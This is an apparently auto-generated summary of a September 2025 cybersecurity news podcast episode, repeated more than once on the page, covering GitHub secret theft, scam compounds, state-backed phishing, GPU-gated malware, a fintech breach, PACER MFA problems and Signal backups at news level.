Cyber Security Headlines – September 9, 2025

Podcast: Cyber Security Headlines
Host: Rich Stroffolino, CISO Series
Main Theme:
A fast-paced overview of the top stories in information security, highlighting major breaches, novel cybercrime campaigns, new vulnerabilities, and trends impacting the tech and legal sectors.

Key Discussion Points & Insights

1. GhostAction Campaign Targets GitHub

[00:07–01:15]

Incident Overview: GitGuardian discovered that their internal FastUUID GitHub project was compromised. The attack enumerated secrets from workflow files and hardcoded secret names into workflows.
Scope: The wider campaign, dubbed "GhostAction", affected 327 GitHub users and 817 repositories, leaking over 3,300 secrets including AWS instances, Docker Hub, and npm tokens.
Response: GitGuardian notified security teams at GitHub, PyPI, and npm; many repositories were already reverted to mitigate the leak.

Memorable Quote:

“This campaign leaked over 3,300 secrets, including AWS instances, Docker Hub tokens and npm tokens.”
— Rich Stroffolino, [00:45]

2. Industrial-scale Scam Centers Proliferate in Myanmar

[01:16–01:43]

Scale & Location: New research and drone footage reveal that scam call centers on the Thai-Myanmar border have more than doubled since the 2021 military coup.
Construction Rate: New criminal compounds are being built at a staggering rate of 55 hectares per month.
Human Trafficking: Thai police estimate at least 100,000 individuals are trafficked into these centers, lured by false job promises.
Criminal Innovation: Fortified centers include luxury accommodations for management, serving as “social proof” for various investment scams.

Quote:

“These elaborate facilities are heavily fortified and contain luxury housing for management as well as serving as social proof for investment scams.”
— [01:38]

3. Chinese APT41 Impersonates US Lawmaker in Cyber-espionage Campaign

[01:44–02:20]

Attack Method: APT41 (Chinese-backed advanced persistent threat group) orchestrated an email campaign posing as U.S. Congressman John Moliner (CH), targeting trade groups, U.S. government agencies and law firms.
Malware Delivery: The phishing emails included attachments appearing to be draft legislation, designed to prompt user interaction and install a backdoor.
Context: Occurred at the onset of US–China trade talks in Sweden.

Quote:

“An investigation by Google’s Mandiant found that clicking on the attachments would attempt to install a backdoor.”
— [02:08]

4. ‘GPUgate’: New Malvertising Tactic Targets IT Firms

[02:21–03:07]

Attack Mechanism: Dubbed 'GPUgate', the campaign uses paid ads in search results containing GitHub commit URLs leading to malicious downloads.
Technical Innovation: The malware’s payload is locked behind a “GPU-gated decryption routine”—if the system lacks a GPU (as is typical in sandboxes or VMs), the malware remains encrypted, evading analysis.
Target Profile: Exclusively targets IT and software development companies in Western Europe; operators speak Russian.

Quote:

“This would stymie analysis of the malware on a virtual machine or other sandbox that doesn’t typically have GPU resources.”
— [02:49]

5. iCloud Calendar Used for Advanced Phishing Scheme

[03:50–04:28]

Phishing Details: Scammers sent fake PayPal billing notices via iCloud Calendar events to a Microsoft 365 mailing list.
Technique: The phishing approach successfully passed SPF, DMARC, and DKIM checks, raising the stakes for anti-phishing defenses.

Quote:

“While the phishing lure is an extremely tried and true approach, the way it was delivered successfully passed SPF, DMARC and DKIM email security checks.”
— [04:23]

6. Wealthsimple Data Breach Impacts 1% of Customers

[04:29–04:52]

Scope: Fintech firm Wealthsimple confirmed a breach exposing government IDs, SINs, and account numbers of 30,000 clients (under 1% of customer base).
Cause: Stemming from a compromised third-party provider, identified on August 30th; affected customers notified by September 5th.
Remediation: Two years of credit and dark web monitoring offered; customers urged to enable two-factor authentication.

7. PACER Struggles with Multi-Factor Authentication Rollout

[04:53–05:28]

System: PACER, the US government’s case file access system, is trying to enforce MFA for document filers and case managers.
Problems: Enrollment freeze-ups, overwhelmed support lines, and long wait times prompted a delay from a hard deadline to a phased rollout.
Advice: Users should wait to enroll until the system prompts them.

8. Signal Launches Encrypted Chat Backup with Paid Option

[05:29–06:16]

Feature: Signal introduces beta chat backup for Android—free for basic usage (100MB of chat, 45 days media), and paid plan ($1.99/month) for up to 100GB.
Privacy: Backups are encrypted with a 64-character key generated on-device; backups are not linked to user identity or payment info.
Significance: This is Signal’s first paid feature, previously funded solely by donations; iOS support coming soon.

Notable Quotes & Moments

“This campaign leaked over 3,300 secrets, including AWS instances, Docker Hub tokens and npm tokens.” — Rich Stroffolino, [00:45]
“These elaborate facilities are heavily fortified and contain luxury housing for management as well as serving as social proof for investment scams.” — [01:38]
“An investigation by Google’s Mandiant found that clicking on the attachments would attempt to install a backdoor.” — [02:08]
“This would stymie analysis of the malware on a virtual machine or other sandbox that doesn’t typically have GPU resources.” — [02:49]
“While the phishing lure is an extremely tried and true approach, the way it was delivered successfully passed SPF, DMARC and DKIM email security checks.” — [04:23]

Additional Segments

Editorial Note:
The show highlights an episode tackling the perennial gap between security “prevention” advice and workplace adoption, with the tongue-in-cheek title:

“We all agree that prevention is the best advice we’re never going to follow.” — [06:47]
Community Engagement:
Listeners are encouraged to send feedback to the show, which “reads everything that you send us and we love to hear from you.” — Rich Stroffolino, [07:02]

Conclusion

This episode provides a succinct but comprehensive sweep of major infosec stories—from elite cyber-espionage and creative malware distribution to practical security headaches for end users and institutions. The recurring message: threats are evolving, prevention is complex, and community awareness is critical.

Cyber Security Headlines – September 9, 2025

Key Discussion Points & Insights

1. GhostAction Campaign Targets GitHub

[00:07–01:15]

Incident Overview: GitGuardian discovered that their internal FastUUID GitHub project was compromised. The attack enumerated secrets from workflow files and hardcoded secret names into workflows.
Scope: The wider campaign, dubbed "GhostAction", affected 327 GitHub users and 817 repositories, leaking over 3,300 secrets including AWS instances, Docker Hub, and npm tokens.
Response: GitGuardian notified security teams at GitHub, PyPI, and npm; many repositories were already reverted to mitigate the leak.

Memorable Quote:

“This campaign leaked over 3,300 secrets, including AWS instances, Docker Hub tokens and npm tokens.”
— Rich Stroffolino, [00:45]

2. Industrial-scale Scam Centers Proliferate in Myanmar

[01:16–01:43]

Scale & Location: New research and drone footage reveal that scam call centers on the Thai-Myanmar border have more than doubled since the 2021 military coup.
Construction Rate: New criminal compounds are being built at a staggering rate of 55 hectares per month.
Human Trafficking: Thai police estimate at least 100,000 individuals are trafficked into these centers, lured by false job promises.
Criminal Innovation: Fortified centers include luxury accommodations for management, serving as “social proof” for various investment scams.

Quote:

“These elaborate facilities are heavily fortified and contain luxury housing for management as well as serving as social proof for investment scams.”
— [01:38]

3. Chinese APT41 Impersonates US Lawmaker in Cyber-espionage Campaign

[01:44–02:20]

Attack Method: APT41 (Chinese-backed advanced persistent threat group) orchestrated an email campaign posing as U.S. Congressman John Moliner (CH), targeting trade groups, U.S. government agencies and law firms.
Malware Delivery: The phishing emails included attachments appearing to be draft legislation, designed to prompt user interaction and install a backdoor.
Context: Occurred at the onset of US–China trade talks in Sweden.

Quote:

“An investigation by Google’s Mandiant found that clicking on the attachments would attempt to install a backdoor.”
— [02:08]

4. ‘GPUgate’: New Malvertising Tactic Targets IT Firms

[02:21–03:07]

Attack Mechanism: Dubbed 'GPUgate', the campaign uses paid ads in search results containing GitHub commit URLs leading to malicious downloads.
Technical Innovation: The malware’s payload is locked behind a “GPU-gated decryption routine”—if the system lacks a GPU (as is typical in sandboxes or VMs), the malware remains encrypted, evading analysis.
Target Profile: Exclusively targets IT and software development companies in Western Europe; operators speak Russian.

Quote:

“This would stymie analysis of the malware on a virtual machine or other sandbox that doesn’t typically have GPU resources.”
— [02:49]

5. iCloud Calendar Used for Advanced Phishing Scheme

[03:50–04:28]

Phishing Details: Scammers sent fake PayPal billing notices via iCloud Calendar events to a Microsoft 365 mailing list.
Technique: The phishing approach successfully passed SPF, DMARC, and DKIM checks, raising the stakes for anti-phishing defenses.

Quote:

“While the phishing lure is an extremely tried and true approach, the way it was delivered successfully passed SPF, DMARC and DKIM email security checks.”
— [04:23]

6. Wealthsimple Data Breach Impacts 1% of Customers

[04:29–04:52]

Scope: Fintech firm Wealthsimple confirmed a breach exposing government IDs, SINs, and account numbers of 30,000 clients (under 1% of customer base).
Cause: Stemming from a compromised third-party provider, identified on August 30th; affected customers notified by September 5th.
Remediation: Two years of credit and dark web monitoring offered; customers urged to enable two-factor authentication.

7. PACER Struggles with Multi-Factor Authentication Rollout

[04:53–05:28]

System: PACER, the US government’s case file access system, is trying to enforce MFA for document filers and case managers.
Problems: Enrollment freeze-ups, overwhelmed support lines, and long wait times prompted a delay from a hard deadline to a phased rollout.
Advice: Users should wait to enroll until the system prompts them.

8. Signal Launches Encrypted Chat Backup with Paid Option

[05:29–06:16]

Feature: Signal introduces beta chat backup for Android—free for basic usage (100MB of chat, 45 days media), and paid plan ($1.99/month) for up to 100GB.
Privacy: Backups are encrypted with a 64-character key generated on-device; backups are not linked to user identity or payment info.
Significance: This is Signal’s first paid feature, previously funded solely by donations; iOS support coming soon.

Notable Quotes & Moments

“This campaign leaked over 3,300 secrets, including AWS instances, Docker Hub tokens and npm tokens.” — Rich Stroffolino, [00:45]
“These elaborate facilities are heavily fortified and contain luxury housing for management as well as serving as social proof for investment scams.” — [01:38]
“An investigation by Google’s Mandiant found that clicking on the attachments would attempt to install a backdoor.” — [02:08]
“This would stymie analysis of the malware on a virtual machine or other sandbox that doesn’t typically have GPU resources.” — [02:49]
“While the phishing lure is an extremely tried and true approach, the way it was delivered successfully passed SPF, DMARC and DKIM email security checks.” — [04:23]

Additional Segments

Editorial Note:
The show highlights an episode tackling the perennial gap between security “prevention” advice and workplace adoption, with the tongue-in-cheek title:

“We all agree that prevention is the best advice we’re never going to follow.” — [06:47]
Community Engagement:
Listeners are encouraged to send feedback to the show, which “reads everything that you send us and we love to hear from you.” — Rich Stroffolino, [07:02]

wavePod

GhostAction campaign, scam centers grow, GPUGate hits IT

Powered by Wave AI

Summary

Cyber Security Headlines – September 9, 2025

Key Discussion Points & Insights

1. GhostAction Campaign Targets GitHub

2. Industrial-scale Scam Centers Proliferate in Myanmar

3. Chinese APT41 Impersonates US Lawmaker in Cyber-espionage Campaign

4. ‘GPUgate’: New Malvertising Tactic Targets IT Firms

5. iCloud Calendar Used for Advanced Phishing Scheme

6. Wealthsimple Data Breach Impacts 1% of Customers

7. PACER Struggles with Multi-Factor Authentication Rollout

8. Signal Launches Encrypted Chat Backup with Paid Option

Notable Quotes & Moments

Additional Segments

Conclusion

Summary

Cyber Security Headlines – September 9, 2025

Key Discussion Points & Insights

1. GhostAction Campaign Targets GitHub

2. Industrial-scale Scam Centers Proliferate in Myanmar

3. Chinese APT41 Impersonates US Lawmaker in Cyber-espionage Campaign

4. ‘GPUgate’: New Malvertising Tactic Targets IT Firms

5. iCloud Calendar Used for Advanced Phishing Scheme

6. Wealthsimple Data Breach Impacts 1% of Customers

7. PACER Struggles with Multi-Factor Authentication Rollout

8. Signal Launches Encrypted Chat Backup with Paid Option

Notable Quotes & Moments

Additional Segments

Conclusion